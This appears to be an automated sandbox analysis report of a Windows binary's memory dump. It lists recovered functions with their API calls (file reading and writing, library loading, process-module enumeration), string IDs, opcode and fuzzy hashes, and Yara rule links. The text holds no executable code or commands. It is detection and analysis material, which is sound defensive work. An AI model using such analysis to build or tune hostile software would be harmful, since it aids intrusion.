                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: d
                                                                                                                  • API String ID: 0-2564639436
                                                                                                                  • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                  • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: BINARY
                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                  • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                  • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /stext
                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                  • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                  • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                  Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: .'v
                                                                                                                  • API String ID: 2081463915-2049903856
                                                                                                                  • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                  • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2445788494-0
                                                                                                                  • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                  • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                  Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                  • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                  • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                  • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                  • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1065087418-0
                                                                                                                  • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                  • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                  Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3700833809-0
                                                                                                                  • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                  • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                  • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                  • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                  Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1381354015-0
                                                                                                                  • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                  • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                  Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004301AD
                                                                                                                  • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1297977491-0
                                                                                                                  • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                  • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                  Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2154303073-0
                                                                                                                  • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                  • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3150196962-0
                                                                                                                  • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                  • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3154509469-0
                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4232544981-0
                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859505661-0
                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2738559852-0
                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
